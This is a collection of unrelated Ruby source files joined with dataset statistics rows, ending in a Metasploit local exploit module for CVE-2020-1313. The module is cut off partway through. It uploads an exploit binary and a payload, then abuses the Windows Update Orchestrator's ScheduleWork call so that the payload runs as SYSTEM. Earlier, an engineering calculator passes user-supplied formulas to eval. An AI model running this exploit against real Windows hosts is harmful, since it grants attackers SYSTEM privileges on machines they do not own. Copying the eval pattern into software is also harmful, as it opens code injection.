styles = ActiveSupport::JSON.decode(Spree::Config[:attachment_styles])
styles["jumbo"].should == "2000x2000>"
end
end
context "amazon s3" do
after(:all) do
Spree::Image.attachment_definitions[:attachment].delete :storage
end
it "should be able to update s3 settings" do
spree_put :update, { :preferences => {
"use_s3" => "1",
"s3_access_key" => "a_valid_key",
"s3_secret" => "a_secret",
"s3_bucket" => "some_bucket"
}
}
Spree::Config[:use_s3].should be_true
Spree::Config[:s3_access_key].should == "a_valid_key"
Spree::Config[:s3_secret].should == "a_secret"
Spree::Config[:s3_bucket].should == "some_bucket"
end
context "headers" do
before(:each) { Spree::Config[:use_s3] = true }
it "should be able to update the s3 headers" do
spree_put :update, { :preferences => { "use_s3" => "1" }, "s3_headers" => { "Cache-Control" => "max-age=1111" } }
headers = ActiveSupport::JSON.decode(Spree::Config[:s3_headers])
headers["Cache-Control"].should == "max-age=1111"
end
it "should be able to add a new header" do
spree_put :update, { "s3_headers" => { }, "new_s3_headers" => { "1" => { "name" => "Charset", "value" => "utf-8" } } }
headers = ActiveSupport::JSON.decode(Spree::Config[:s3_headers])
headers["Charset"].should == "utf-8"
end
end
end
end
end
| 36.913043 | 143 | 0.584609 |
18fea0e95aa9daf542c6169b81f567be8b64671a | 393 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::EventGrid::Mgmt::V2019_01_01
  module Models
    #
    # Defines values for ResourceRegionType
    #
    # String enum with two members: RegionalResource and GlobalResource.
    module ResourceRegionType
      RegionalResource = "RegionalResource"
      GlobalResource = "GlobalResource"
    end
  end
end
1a67d2ac3dbad9b14c726c32dd193ce02252edf3 | 546 | module AArch64
module Instructions
  # LDG -- A64
  # Load Allocation Tag
  # LDG <Xt>, [<Xn|SP>{, #<simm>}]
  class LDG
    def initialize xt, xn, imm9
      @xt   = xt
      @xn   = xn
      @imm9 = imm9
    end

    # Returns the 32-bit instruction word as an Integer.
    def encode
      opcode | imm9_field | xn_field | xt_field
    end

    private

    # Fixed opcode bits with all operand fields cleared.
    def opcode
      0b11011001_0_1_1_000000000_0_0_00000_00000
    end

    # Signed 9-bit immediate, masked and placed at bits 20..12.
    def imm9_field
      (@imm9 & 0x1ff) << 12
    end

    # Base register <Xn|SP> number at bits 9..5.
    def xn_field
      (@xn.to_i & 0x1f) << 5
    end

    # Transfer register <Xt> number at bits 4..0.
    def xt_field
      @xt.to_i & 0x1f
    end
  end
end
end
| 18.827586 | 57 | 0.485348 |
1d98f78f44fe837f0e6f9bb3faaf99abbb9ac17b | 969 | require 'find'
module Ginseng
  # Enumerates files under a directory, filtered by basename patterns and
  # optional age/emptiness criteria.
  class FileFinder
    attr_accessor :dir, :patterns, :mtime, :atime, :empty

    def initialize
      @patterns = []
    end

    # Yields every matching path under #dir; returns an Enumerator when
    # no block is given.
    def execute
      return enum_for(__method__) unless block_given?
      Find.find(@dir) do |f|
        next unless match_patterns?(f)
        next unless match_mtime?(f)
        next unless match_atime?(f)
        next unless match_empty?(f)
        yield f
      end
    end
    alias exec execute

    private

    # True when the basename matches any configured fnmatch pattern.
    def match_patterns?(path)
      return @patterns.any? do |pattern|
        File.fnmatch(pattern, File.basename(path))
      end
    end

    # True when no mtime threshold is set, or the file was modified more
    # than @mtime days ago. Uses File.mtime instead of File.new(...).mtime
    # so no file descriptor is opened and leaked.
    # (@mtime.days.ago relies on ActiveSupport being loaded by the host app.)
    def match_mtime?(path)
      return true unless @mtime
      return File.mtime(path) < @mtime.days.ago
    end

    # Same as match_mtime?, but for access time.
    def match_atime?(path)
      return true unless @atime
      return File.atime(path) < @atime.days.ago
    end

    # True when no emptiness filter is set, or the file is zero bytes.
    def match_empty?(path)
      return true unless @empty
      return File.size(path).zero?
    end
  end
end
| 20.1875 | 57 | 0.621259 |
bb18c2cbbd21fbac9ac2b82d9c54bdb91b8a79c2 | 626 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe CorporationPolicy, type: :policy do
  subject { described_class }

  let(:user) { User.new }

  # Scope resolution still needs real examples.
  permissions '.scope' do
    pending "add some examples to (or delete) #{__FILE__}"
  end

  # The CRUD permissions all share the same placeholder, so generate them.
  %i[show? create? update? destroy?].each do |action|
    permissions action do
      pending "add some examples to (or delete) #{__FILE__}"
    end
  end
end
| 20.866667 | 58 | 0.691693 |
117ccb090c272e83566eb4eb7c50d034edb4ab8f | 562 | module FunWith
module Patterns
  module Loader
    # To simplify installing the loader pattern, loader_pattern_configure() is now going to be
    # callable on all objects by default, and will include FunWith::Patterns::Loader
    module ObjectAPI
      # Bootstraps the loader pattern on the receiver: mixes in Loader,
      # then re-invokes loader_pattern_configure with the same args,
      # expecting the include to have replaced this method.
      def loader_pattern_configure( *args )
        include FunWith::Patterns::Loader
        # hoping (vainly) that when the include finishes, loader_pattern_configure() is now a different method
        loader_pattern_configure( *args )
      end
    end
  end
end
end | 33.058824 | 112 | 0.670819 |
4a80760f19fb67905ba8ed375a7a310f43f2b728 | 3,726 | module Bakery
class Croissant
  PACKAGE_OF_3 = 5.95
  PACKAGE_OF_5 = 9.95
  PACKAGE_OF_9 = 16.99
  INVALID_AMOUNTS = [1, 2, 4, 7].freeze

  # For each value of (pieces % 9): how many 9-packs to give back from the
  # integer division (nine_delta) and how many 5- and 3-packs to add.
  # This replaces nine near-identical show_price_for_*_remainder methods.
  PACKAGE_SPLIT = {
    0 => { nine_delta: 0,  fives: 0, threes: 0 },
    1 => { nine_delta: -1, fives: 2, threes: 0 },
    2 => { nine_delta: -1, fives: 1, threes: 2 },
    3 => { nine_delta: 0,  fives: 0, threes: 1 },
    4 => { nine_delta: -1, fives: 2, threes: 1 },
    5 => { nine_delta: 0,  fives: 1, threes: 0 },
    6 => { nine_delta: 0,  fives: 0, threes: 2 },
    7 => { nine_delta: -1, fives: 2, threes: 2 },
    8 => { nine_delta: 0,  fives: 1, threes: 1 },
  }.freeze

  # Returns { total:, consists_of: } describing the cheapest valid package
  # breakdown for `pieces` croissants, or an error hash for amounts that
  # cannot be served exactly.
  #
  # Fix: the remainder-0 case previously skipped .round(2), so multiples
  # of 9 could render float artifacts (e.g. "$50.969999..."); the total is
  # now rounded for every remainder.
  def croissant_pricing(pieces)
    return invalid_amount if INVALID_AMOUNTS.include?(pieces)

    split  = PACKAGE_SPLIT.fetch(pieces % 9)
    nines  = pieces / 9 + split[:nine_delta]
    fives  = split[:fives]
    threes = split[:threes]

    total = (nines * PACKAGE_OF_9 + fives * PACKAGE_OF_5 + threes * PACKAGE_OF_3).round(2)

    # The 9-pack line is always shown (even with a zero count, as before);
    # 5- and 3-pack lines appear only when used.
    lines = ["#{nines} X 9 $16.99"]
    lines << "#{fives} X 5 $9.95" if fives.positive?
    lines << "#{threes} X 3 $5.95" if threes.positive?

    {
      total: "#{pieces} CF $#{total}",
      consists_of: lines.join("\n")
    }
  end

  private

  # Error payload for piece counts no package combination can produce.
  def invalid_amount
    { total: "Error: Croissant exact amount can't be served" }
  end
end
end
| 28.442748 | 112 | 0.605743 |
e993373ee26b2eda960d46d630a2c5b2591f17d1 | 1,742 | # Copyright 2017 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
require 'google/storage/network/base'
module Google
  module Storage
    module Network
      # A wrapper class for a PUT Request
      #
      # Extends the base network request with a content type and payload
      # body before dispatching it.
      class Put < Google::Storage::Network::Base
        # link/cred are forwarded to Base; type is the payload MIME type
        # and body the raw payload attached in #transport.
        def initialize(link, cred, type, body)
          super(link, cred)
          @type = type
          @body = body
        end

        # Sets the content type and body on the outgoing request, logs it
        # when GOOGLE_HTTP_VERBOSE is set, then delegates to Base#transport.
        def transport(request)
          request.content_type = @type
          request.body = @body
          puts "network(#{request}: body(#{@body}))" \
            unless ENV['GOOGLE_HTTP_VERBOSE'].nil?
          super(request)
        end
      end
    end
  end
end
| 33.5 | 78 | 0.572331 |
ed8c03e0b877addcae6d08b267f2cbddf27a64ae | 1,016 | class Poco < Formula
  desc "C++ class libraries for building network and internet-based applications"
  homepage "https://pocoproject.org/"
  url "https://pocoproject.org/releases/poco-1.10.1/poco-1.10.1-all.tar.gz"
  sha256 "7f5931e0bb06bc2880a0f3867053a2fddf6c0d3e5dd96342a665460301fc34ca"
  head "https://github.com/pocoproject/poco.git", :branch => "develop"

  bottle do
    cellar :any
    sha256 "0755dff1346ea80aa6202ce3e8269c608960abd4bf0a4566e56075cc99364b57" => :catalina
    sha256 "7abccb2c17823c6dda9dee9e5918fa28ef846d8095252681c83c47bbb674f5c8" => :mojave
    sha256 "70cea3a570e187c3e70a8dbbe1ad2e43be1c159d0d9118c1bfc1a8cc6441e2a4" => :high_sierra
  end

  depends_on "cmake" => :build
  depends_on "[email protected]"

  # Out-of-source CMake build; the MySQL and ODBC data connectors are
  # disabled because their client libraries are not declared as deps.
  def install
    mkdir "build" do
      system "cmake", "..", *std_cmake_args,
                      "-DENABLE_DATA_MYSQL=OFF",
                      "-DENABLE_DATA_ODBC=OFF"
      system "make", "install"
    end
  end

  # Smoke test: the installed cpspc code generator prints its help text.
  test do
    system bin/"cpspc", "-h"
  end
end
| 32.774194 | 93 | 0.701772 |
d5cf84784812567fafaa823a921b55850298baaf | 12,451 | require "engineer_calculator/version"
require 'yaml'
module Engineer
class Calculator
include Math
attr_accessor :error, :alter
def initialize
@error = {}
@opt = nil
end
# Parses and evaluates a formula string with units. Returns a hash of
# { value:, unit:, convert_formula: } on success, nil on failure (details
# are collected in @error). Fix: removed a leftover `p units` debug print
# and a no-op `each_formula[:unit]` statement.
def calc(formula)
  return nil unless formula
  @error = {}
  @result = {}
  @alter = nil
  begin
    # Split into { value:, unit: } fragments; units are converted to SI
    # and their conversion factors folded into the numeric values.
    formula = split_unit(formula.gsub("⋅", "*")).compact
    formula.map! do |each_formula|
      if each_formula[:unit].nil?
        [each_formula[:value], []]
      elsif each_formula[:value] =~ /#{reg(:ari)}/
        [each_formula[:value], [each_formula[:value]]]
      else
        convert_value = convert(each_formula[:unit])
        [sprintf("%.05g", each_formula[:value].to_f * convert_value[0].to_f), convert_value[1].unshift("(").push(")")]
      end
    end
    value = String.new
    units = []
    formula.each do |x|
      # Plain numbers are rationalized to avoid float artifacts; operator
      # and exponent fragments are appended verbatim ("^" becomes "**").
      value << x[0].to_s.sub("^", "**") + (x[0].to_s =~ Regexp.union(reg(:ari), /(?:#{reg(:num)})*(?:#{reg(:double)})+/) ? "" : ".rationalize") unless x[0].empty?
      units << x[1]
    end
    @opt = nil
    converted_formula = formula.inject(String.new) { |f, v| f << v[0].to_s + (v[0] != v[1].join ? v[1].join : " ") }
    # SECURITY: `value` is passed to eval — only call with trusted input.
    return @result = { value: eval(value).to_f, unit: units.flatten.join, convert_formula: converted_formula } unless @error[:unit_not_found].nil?
    @result = { value: sprintf("%.05g", eval(value).to_f), unit: calc_unit(units.flatten), convert_formula: converted_formula }
    @alter = search_unit(@result)
    @result
  rescue StandardError, SyntaxError
    @error[:inapprehensible] = "Sorry, we could not calculate"
    nil
  end
end
def convert(units)
unit = {value: String.new, unit: []}
convert_unit = try_split_each_unit(units).map { |unit|
return [1, [units]] unless @error[:unit_not_found].nil?
convert_to_si_unit(unit)
}.map do |c_value, c_unit, c_type|
if c_type
unit[:value] << c_unit
unit[:unit] << c_unit
else
unit[:value] << "(" + c_value.to_s + "*"
si_unit = split_si_unit(c_unit)
unit[:value] << si_unit[0].to_s + ")"
unit[:unit] << si_unit[1]
end
end
[eval(unit[:value].gsub(/\)\(/,")*(")), unit[:unit].flatten]
end
def try_split_each_unit(units)
type = [:base, :alter, :variable, :base, :ari]
try_method = [
{reg: proc {/#{unit_reg}/}, case: @opt=nil, type: nil},
{reg: proc {/#{unit_reg}/}, case: @opt=:upcase, type: nil},
{reg: proc {/(#{reg(:variable)})/}, case: @opt=:upcase, type: :variable},
]
try_method.each do |try|
unit = []
@opt = try[:case]
app_unit = send_method(units, @opt).scan(try[:reg].call).map do |e_unit|
e_unit.each_with_index { |a_unit,i| unit.push({(try[:type] || type[i]) => a_unit}) if a_unit }
end
next unless app_unit.join == send_method(units, @opt)
@error[:capitalize] = "upper/lower case shall be follows / 大文字、小文字は使い分けてください" if @opt
return unit
end
@error[:unit_not_found] ||= [" could not be found"]
@error[:unit_not_found].unshift(units)
{unit_not_found: units}
end
def send_method(str, method=nil)
method ? str.send(method) : str
end
def calc_unit(units) #配列で単位を受け取る。
par = parenthesis_unit(units)
par.reverse_each do |index|
by_value = units[index[0]..index[1]]
unit = plus_minus_split(by_value)
unit.map! do |each_unit|
multi_div_unit each_unit
end
unit = plus_minus_unit(unit)
add = by_value.include?("(") ? 1 : 0
units[(index[0]+add)..(index[1]-add)] = unit + Array.new(units[(index[0]+add)..(index[1]-add)].size-unit.size)
end
units.compact!
units.reject!{ |x| x =~ /\(|\)/ }
unit_arrange units
end
def unit_arrange(units)
pos = []
neg = []
units.each do |unit|
num = unit.match(/(?<base>#{reg(:base)}){1}(?<num>-*\d*)/)
unless num.nil?
if num[:num].nil? || num[:num].to_i.positive?
number = num[:num].to_i == 1 ? nil : num[:num]
pos << num[:base] + number.to_s
else
number = num[:num].to_i == -1 ? nil : - (num[:num].to_i)
neg << num[:base] + number.to_s
end
end
end
div = neg.size > 1 ? ("/" + "(" + neg.join("*") + ")") : (neg.empty? ? nil : "/" + neg.join.to_s)
pos.join("*") + div.to_s
end
def search_unit(value:, unit:, convert_formula: nil)
compare_unit = multi_div_unit(split_si_unit(unit)[1]).sort
all_unit = {si_unit: [], variable: []}
si_base_unit.merge(si_derived_unit).delete_if { |type, e_unit|
compare_unit != multi_div_unit(split_si_unit(e_unit)[1]).sort
}.each do |unit_name, e_unit|
all_unit[:si_unit] << [unit_name, si_alter_unit[unit_name] ? si_alter_unit[unit_name].join(" : ") : nil ]
all_unit[:variable] << [unit_name, variable_unit[unit_name] ? variable_unit[unit_name].map { |v_unit, v_value| [v_unit, value.to_f * v_value.to_f] } : nil]
end
all_unit
end
def plus_minus_unit(array)
array.each_with_index do |value, i|
unless i == 0 || (array[i-1].sort == array[i].sort)
@error[:plus_minus] ||= ["is different unit./ 足し算の単位が違います。"]
@error[:plus_minus].unshift "#{unit_arrange(array[i-1])} + #{unit_arrange(array[i])}"
end
end
array[0]
end
def plus_minus_split(units)
if units.any?{|x| x=="+" || x=="-"}
num = [0]
array = []
units.each_with_index { |x, i| num << i if x == "+" || x == "-" }
num << units.size - 1
num.each_with_index { |x, i| array << units[num[i-1]..x].reject!{|x| ["+", "-"].include?(x) } unless i==0 }
array
else
[units]
end
end
def multi_div_unit(units)
unit_hash = Hash.new(0)
ari = "+"
end_par = "+"
units.compact! unless units.nil?
units.each do |unit|
case unit
when "*", "・", "⋅"
ari = "+" unless end_par == "-"
when "/"
ari = "-"
when "("
end_par = "-" if ari == "-"
when ")"
end_par = "+"
else
num = unit.match(/(?<base>#{reg(:base)}){1}(?<num>-*\d*)/)
base = num[:base]
num = num[:num].empty? ? 1 : num[:num]
unit_hash[base] = eval(unit_hash[base].to_s + ari + num.to_s)
ari = "+" unless end_par == "-"
end
end
unit_hash.sort{|a,b| b[1] <=> a[1]}.map { |key, value| value == 0 ? nil : key + value.to_s}.compact
end
def parenthesis_unit(formula) #formulaは配列で入ってくる。["m","/","s"]
array = []
count = []
formula.each_with_index do |value, index|
case value
when "("
array.push [index, nil]
count << array.size - 1
when ")"
array[count.pop][1] = index
end
end
array.unshift([0,formula.size-1])
end
def split_si_unit(si_unit)
unit = si_unit.split(/([\*\/\(\)])/).reject(&:empty?).map do |s_unit|
s_unit =~ /([\*\/\(\)])/ ? s_unit : extraction_metric(s_unit)
end
value = String.new
unit_si = []
unit.each do |each_unit|
case each_unit
when Array
value << each_unit[0].to_s
unit_si << each_unit[1]
when String
value << each_unit.to_s
unit_si << each_unit
end
end
[eval(value.gsub(/^(#{reg(:ari)})/,"")), unit_si]
end
def extraction_metric(si_unit)
unit = {}
si_unit.upcase! if @opt
si_unit.match(/(?<metric>#{reg(:metric)})?(?<base>(#{reg(:base)}|g){1})(?<numeric>-*\d)*/) do |sp_unit|
unit[:original] = sp_unit[0]
unit[:metric] = @opt && sp_unit[:metric] ? metric_prefix_unit.each_key { |metric| break metric if sp_unit[:metric].upcase == metric.upcase } : sp_unit[:metric]
unit[:base] = @opt ? si_base_unit.each_value { |b_unit| break b_unit if b_unit.upcase == sp_unit[:base].upcase } : sp_unit[:base]
unit[:numeric] = sp_unit[:numeric] || 1
end
metric = if unit[:base] == "g"
unit_base = "kg"
convert_metric_weight(unit[:metric])
else
unit[:metric] ? convert_metric(unit[:metric]).to_f**(unit[:numeric].to_f || 1) : 1
end
[metric.to_f, unit_base || unit[:base] + ( unit[:numeric] != 1 ? unit[:numeric].to_s : "" )]
end
def convert_metric(metric)
metric_prefix_unit[metric]
end
def convert_metric_weight(weight_metric)
convert_metric(weight_metric).to_f / convert_metric("k").to_f
end
def convert_to_si_unit(kind_of_unit)
if kind_of_unit[:alter]
unit = kind_of_unit[:alter]
alter_unit = {}
unit.match(/(?<metric>#{reg(:metric)})?(?<alter>#{reg(:alter)})/) do |si_unit|
alter_unit[:metric] = si_unit[:metric] ? metric_prefix_unit.each { |m_unit, value| break m_unit if si_unit[:metric].upcase == m_unit.upcase } : nil
alter_unit[:alter] = @opt ? si_alter_unit.each { |kind, a_unit| break a_unit[0] if si_unit[:alter].upcase == a_unit[0].upcase } : si_unit[:alter]
end
si_alter_unit.each do |key, value|
return [convert_metric(alter_unit[:metric]) || 1, si_base_unit.merge(si_derived_unit)[key]] if value.include?(alter_unit[:alter])
end
elsif kind_of_unit[:variable]
unit = kind_of_unit[:variable]
variable_unit.each do |kind, v_unit|
return [1.0/v_unit[unit].to_f, si_base_unit.merge(si_derived_unit)[kind]] if v_unit.key?(unit)
v_unit.each do |v_unit_name, value|
return [1.0/value.to_f, si_base_unit.merge(si_derived_unit)[kind]] if v_unit_name.upcase == unit.upcase
end
end
elsif kind_of_unit[:ari]
[kind_of_unit[:ari], kind_of_unit[:ari], :ari]
else
[1, kind_of_unit[:base]]
end
end
def split_unit(formula)
unit_array = []
formula_pre = formula.to_s.delete(" ")
formula_pre.scan(/(#{reg(:tri)})|(?:(#{reg(:num)}(?:#{reg(:double)})*)((?:\/?\(?\/?[a-z]+\d*(?:\*[a-z])*(?:\W*[a-z]\d*\)*)*)(?:-*\d[^[a-z]])*\)?))|(#{reg(:ari)})|((?:#{reg(:num)})*(?:#{reg(:double)})?)/i).each do |data|
unit_array << { value: (data[0] || data[1] || data[3] || data[4]), unit: (data[2] || data[3]) }
end
unit_array.each_with_index do |data, index|
if data[:unit] =~ /^[^\(]+\)$/
data[:unit].gsub!(/.$/,'')
unit_array.insert(index+1, { value: ")", unit: ")" })
end
end
unit_array
end
def si_base_unit
@si_base_unit ||= YAML.load_file(File.join(__dir__, '/unit/si_base_unit.yml'))
end
def si_derived_unit
@si_derived_unit ||= YAML.load_file(File.join(__dir__, 'unit/si_derived_unit.yml'))
end
def variable_unit
@variable_unit ||= YAML.load_file(File.join(__dir__, 'unit/variable_unit.yml'))
end
def metric_prefix_unit
@metric_prefix ||= YAML.load_file(File.join(__dir__, 'unit/metric_prefix.yml'))
end
def si_alter_unit
@si_alter_unit ||= YAML.load_file(File.join(__dir__, 'unit/si_alter_unit.yml'))
end
def reg(kind_of_unit)
case kind_of_unit
when :ari
/(?:[\(\)\+\-\*\/])/
when :double
/(?:\^\(?[\+\-]?\d+\/?\d*\)?)/
when :num
/\d+(?:\.\d*)?(?:e[+-]?\d+)?/
when :tri
/(?:sin|cos|tan)\(.+\)/
else
hash_name = self.methods.grep(/.*#{kind_of_unit.to_s}.*(_unit)$/).first.to_s
unit_hash = if hash_name.include?("variable")
hash = {}
send(hash_name).values.each{|x| hash.merge!(x)}.flatten
hash
else
send hash_name
end
keys_or_values = hash_name.to_s.include?("si") ? :values : :keys
Regexp.new("#{unit_hash.send(keys_or_values).flatten.sort{|a,b| b.size <=> a.size}.map{|x| "|#{send_method(Regexp.escape(x), @opt)}"}.join}".gsub(/^\|/,""))
end
end
def unit_reg
/(#{reg(:derived)})|((?:#{reg(:metric)})?#{reg(:alter)})|(#{reg(:variable)})|((?:#{reg(:metric)})?(?:#{reg(:base)}|g){1}-*\d*)|(#{reg(:ari)})/
end
end
end
| 36.194767 | 225 | 0.546462 |
# Controller for the (single) Kubernetes/GKE cluster attached to a project.
# Handles the Google OAuth handshake, cluster creation through GCP, status
# polling, updates and removal.
class Projects::ClustersController < Projects::ApplicationController
before_action :cluster, except: [:login, :index, :new, :create]
before_action :authorize_read_cluster!
before_action :authorize_create_cluster!, only: [:new, :create]
before_action :authorize_google_api, only: [:new, :create]
before_action :authorize_update_cluster!, only: [:update]
before_action :authorize_admin_cluster!, only: [:destroy]
# A project has at most one cluster: show it if present, otherwise offer
# to create one.
def index
if project.cluster
redirect_to project_cluster_path(project, project.cluster)
else
redirect_to new_project_cluster_path(project)
end
end
# Build the Google OAuth authorize URL, stashing the post-auth redirect
# target in the session keyed by a fresh state token.
def login
begin
state = generate_session_key_redirect(namespace_project_clusters_url.to_s)
@authorize_url = GoogleApi::CloudPlatform::Client.new(
nil, callback_google_api_auth_url,
state: state).authorize_url
rescue GoogleApi::Auth::ConfigMissingError
# no-op: OAuth is simply not configured; the view renders without a link
end
end
def new
@cluster = project.build_cluster
end
# Kick off GKE cluster provisioning with the user's Google token.
def create
@cluster = Ci::CreateClusterService
.new(project, current_user, create_params)
.execute(token_in_session)
if @cluster.persisted?
redirect_to project_cluster_path(project, @cluster)
else
render :new
end
end
# JSON polling endpoint for provisioning status (10s client interval).
def status
respond_to do |format|
format.json do
Gitlab::PollingInterval.set_header(response, interval: 10_000)
render json: ClusterSerializer
.new(project: @project, current_user: @current_user)
.represent_status(@cluster)
end
end
end
def show
end
def update
Ci::UpdateClusterService
.new(project, current_user, update_params)
.execute(cluster)
if cluster.valid?
flash[:notice] = "Cluster was successfully updated."
redirect_to project_cluster_path(project, project.cluster)
else
render :show
end
end
def destroy
if cluster.destroy
flash[:notice] = "Cluster integration was successfully removed."
redirect_to project_clusters_path(project), status: 302
else
flash[:notice] = "Cluster integration was not removed."
render :show
end
end
private
# Memoized presenter around the project's cluster.
def cluster
@cluster ||= project.cluster.present(current_user: current_user)
end
def create_params
params.require(:cluster).permit(
:gcp_project_id,
:gcp_cluster_zone,
:gcp_cluster_name,
:gcp_cluster_size,
:gcp_machine_type,
:project_namespace,
:enabled)
end
# Only namespace and enabled flag may change after creation.
def update_params
params.require(:cluster).permit(
:project_namespace,
:enabled)
end
# Bounce through the OAuth flow when the stored Google token is missing
# or expired.
def authorize_google_api
unless GoogleApi::CloudPlatform::Client.new(token_in_session, nil)
.validate_token(expires_at_in_session)
redirect_to action: 'login'
end
end
def token_in_session
@token_in_session ||=
session[GoogleApi::CloudPlatform::Client.session_key_for_token]
end
def expires_at_in_session
@expires_at_in_session ||=
session[GoogleApi::CloudPlatform::Client.session_key_for_expires_at]
end
# Store +uri+ in the session under a fresh key and return that key, used
# as the OAuth state parameter.
def generate_session_key_redirect(uri)
GoogleApi::CloudPlatform::Client.new_session_key_for_redirect_uri do |key|
session[key] = uri
end
end
def authorize_update_cluster!
access_denied! unless can?(current_user, :update_cluster, cluster)
end
def authorize_admin_cluster!
access_denied! unless can?(current_user, :admin_cluster, cluster)
end
end
| 25.153285 | 81 | 0.701103 |
ed0c823f6b32a30048408a66c1ae29064440cb49 | 354 | # frozen_string_literal: true
require_relative "amqp_channel_binding_contract"
require_relative "amqp_operation_binding_contract"
require_relative "amqp_message_binding_contract"
module Multidapter
module Adapters
module Amqp
module Validators
# Dry::Validation contract for AMQP adapter configuration.
# Currently empty: it exists as the common base/namespace anchor for the
# binding contracts required above. Add schema/rules here as needed.
class AmqpContract < Dry::Validation::Contract
end
end
end
end
end
| 19.666667 | 54 | 0.768362 |
bb5f246387aafb9c41d60fdca9f3d431a9fe7453 | 6,644 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local privilege escalation for CVE-2020-1313: the Windows Update
# Orchestrator's ScheduleWork API does not check the caller's token, so an
# unprivileged session can queue a job that runs as SYSTEM (at some point
# within the next 24 hours -- the exact time cannot be chosen).
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Update Orchestrator unchecked ScheduleWork call',
'Description' => %q{
This exploit uses access to the UniversalOrchestrator ScheduleWork API call
which does not verify the caller's token before scheduling a job to be run
as SYSTEM. You cannot schedule something in a given time, so the payload will
execute as system sometime in the next 24 hours.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Imre Rad', # Original discovery? and PoC (https://github.com/irsl/CVE-2020-1313)
'bwatters-r7' # msf module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' =>
[
['Windows x64', { 'Arch' => ARCH_X64 }]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2019-11-04',
'References' =>
[
['CVE', '2020-1313'],
['URL', 'https://github.com/irsl/CVE-2020-1313']
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => true
}
)
)
register_options([
OptString.new('EXPLOIT_NAME',
[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
OptString.new('PAYLOAD_NAME',
[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
OptString.new('WRITABLE_DIR',
[false, 'Path to write binaries (%TEMP% by default).', nil]),
OptInt.new('EXPLOIT_TIMEOUT',
[true, 'The number of seconds to wait for exploit to finish running', 60]),
OptInt.new('EXECUTE_DELAY',
[true, 'The number of seconds to delay between file upload and exploit launch', 3])
])
end
# Upload the precompiled trigger binary and the payload, run the trigger
# (which schedules the payload via ScheduleWork), then confirm the job by
# reading the UScheduler registry keys. The payload file must be cleaned
# up manually after it fires.
def exploit
exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)
payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)
exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')
temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
payload_path = "#{temp_path}\\#{payload_name}"
exploit_path = "#{temp_path}\\#{exploit_name}"
payload_exe = generate_payload_exe
# Check target
vprint_status('Checking Target')
validate_active_host
validate_target
fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)
# Upload Exploit
vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
ensure_clean_destination(exploit_path)
exploit_bin = exploit_data('cve-2020-1313', 'cve-2020-1313-exe.x64.exe')
write_file(exploit_path, exploit_bin)
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
# Upload Payload
vprint_status("Uploading Payload to #{sysinfo['Computer']} as #{exploit_path}")
ensure_clean_destination(payload_path)
write_file(payload_path, payload_exe)
print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
print_warning("This exploit requires manual cleanup of the payload #{payload_path}")
# Run Exploit
vprint_status('Running Exploit')
begin
output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60)
vprint_status("Exploit Output:\n#{output}")
rescue Rex::TimeoutError => e
elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
end
vprint_status("Cleaning up #{exploit_path}")
ensure_clean_destination(exploit_path)
# Check registry value
unless registry_key_exist?('HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler')
fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!')
end
reg_keys = registry_enumkeys('HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler')
fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!') if reg_keys.nil?
found_job = false
reg_keys.each do |key|
start_arg = registry_getvalinfo("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Orchestrator\\UScheduler\\#{key}", 'startArg')
next unless start_arg['Data'].include? payload_name
found_job = true
queued_time = registry_getvalinfo("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Orchestrator\\UScheduler\\#{key}", 'queuedTime')
# queuedTime is a Windows FILETIME (100ns ticks since 1601-01-01);
# convert to a Unix epoch for display.
q_time_i = queued_time['Data'].unpack1('L_')
q_time_t = (q_time_i / 10000000) - 11644473600
print_good("Payload Scheduled for execution at #{Time.at(q_time_t)}")
end
fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!') unless found_job
end
# Probe the session; a Meterpreter RequestError here means the session is
# dead, which is escalated as an exploit failure.
def validate_active_host
